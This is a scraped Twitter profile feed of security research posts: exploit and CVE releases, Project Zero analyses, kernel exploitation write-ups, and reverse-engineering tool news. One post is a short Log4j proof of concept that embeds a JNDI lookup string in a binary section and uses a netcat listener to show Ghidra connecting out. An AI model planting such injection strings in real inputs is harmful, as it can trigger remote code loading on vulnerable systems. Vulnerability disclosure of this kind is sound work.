0xEBFE (@0x0000ebfe) 's Twitter Profile
0xEBFE

@0x0000ebfe

ID: 1043939304

calendar_today29-12-2012 05:51:34

585 Tweet

731 Followers

1,1K Following

Antoine Goichot (@antoinegoichot) 's Twitter Profile Photo

I have released my exploit for CVE-2020-3153 - Cisco AnyConnect privilege escalation through path traversal github.com/goichot/CVE-20… My notes on this vuln: github.com/goichot/CVE-20… Kudos to Yorick Koster for the advisory & for the -ipc help! Thank you Max for the diagrams!

hashcat (@hashcat) 's Twitter Profile Photo

hashcat 6.0.0 major update released! New Features, new Algorithms, better Performance and much more. Full release notes here: hashcat.net/forum/thread-9…

hashcat 6.0.0 major update released! New Features, new Algorithms, better Performance and much more. Full release notes here: hashcat.net/forum/thread-9…
Secura (@securabv) 's Twitter Profile Photo

❗New whitepaper on Zerologon: CVE 2020-1472 (CVSS:10) available now on our blog: secura.com/blog/zero-logon Our test tool is published on Github here: github.com/SecuraBV/CVE-2… #CVE20201472 #zerologon #netlogon #vulnerability #whitepaper #cybersecurity #windows #CVE

❗New whitepaper on Zerologon: CVE 2020-1472 (CVSS:10) available now on our blog: secura.com/blog/zero-logon Our test tool is published on Github here: github.com/SecuraBV/CVE-2… #CVE20201472 #zerologon #netlogon #vulnerability #whitepaper #cybersecurity #windows #CVE
Ian Beer (@i41nbeer) 's Twitter Profile Photo

Excited to finally publish my lockdown project from earlier this year: an iOS zero-click radio proximity exploit odyssey. googleprojectzero.blogspot.com/2020/12/an-ios…

Jay Freeman (saurik) (@saurik) 's Twitter Profile Photo

Cydia just joined the legal battle against Apple: "A new lawsuit brought by one of Apple's oldest foes seeks to force the iPhone maker to allow alternatives to the App Store, the latest in a growing number of cases that aim to curb the tech giant's power." washingtonpost.com/technology/202…

Maddie Stone (@maddiestone) 's Twitter Profile Photo

Today we're publishing root cause analyses for the seven 0-day exploits we discovered in-the-wild in Oct 2020. Chrome, Windows, Safari, & iOS. Great work to Ian Beer j00ru//vx Samuel Groß clem1 Sergei and Mark! googleprojectzero.blogspot.com/p/rca.html

Ajax (@commial) 's Twitter Profile Photo

Documenting (part of) VDM, the Windows Defender signature format: github.com/commial/experi… Includes example of signature evasion and hourly updates diffing :)

Documenting (part of) VDM, the Windows Defender signature format: github.com/commial/experi…
Includes example of signature evasion and hourly updates diffing :)
Connor McGarr (@33y0re) 's Twitter Profile Photo

After putting together a CVE-2021-21551 POC that leveraged _SEP_TOKEN_PRIVILEGES for exploitation I decided to go the more arduous route & hijack control flow transfer. Here's my write-up. This was a lot of fun!! tl;dr Patch and please enable VBS/HVCI! connormcgarr.github.io/cve-2020-21551…

NCC Group Research & Technology (@nccgroupinfosec) 's Twitter Profile Photo

Blog: CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) - Part 2 - including thoughts on detection by Alex Plaskett research.nccgroup.com/2021/08/17/cve…

Blog: CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) - Part 2 - including thoughts on detection by <a href="/alexjplaskett/">Alex Plaskett</a>  research.nccgroup.com/2021/08/17/cve…
Zhuowei Zhang (@zhuowei) 's Twitter Profile Photo

Ghidra's vulnerable to log4j: __attribute__((__section__(".note.${jndi:ldap://127.0.0.1:1234/abc}"))) int a = 1; int main(){} $ gcc hello.c $ nc -l 1234 Load into Ghidra; it connects to 127.0.0.1:1234. Ghidra 10.0.2, macOS OpenJDK Corretto 11.0.4.11.1 drive.google.com/file/d/1TRx7La…

kylebot (@ky1ebot) 's Twitter Profile Photo

Thanks to itszn , now you can click a play button in the #how2heap main page and start learning various heap exploitation techniques! Want to learn heap in newer libc? No problem. Just select it in the panel on the left!

Thanks to <a href="/itszn13/">itszn</a> , now you can click a play button in the #how2heap main page and start learning various heap exploitation techniques! Want to learn heap in newer libc? No problem. Just select it in the panel on the left!
Quentin Kaiser (@qkaiser) 's Twitter Profile Photo

Today marks the official public release of "unblob", a firmware extraction tool we've developed internally and used in production for a while now. Let's explore what it is in this 🧵(1/12)

p0up0u (@_p0up0u_) 's Twitter Profile Photo

kfd, short for kernel file descriptor, is a project to read and write kernel memory on Apple devices: github.com/felix-pb/kfd

LaurieWired (@lauriewired) 's Twitter Profile Photo

Ghidra 11.1 is OUT! Now with initial support for Swift, and enhanced Mach-O support. Huge news for anyone interested in iOS/MacOS Reverse Engineering!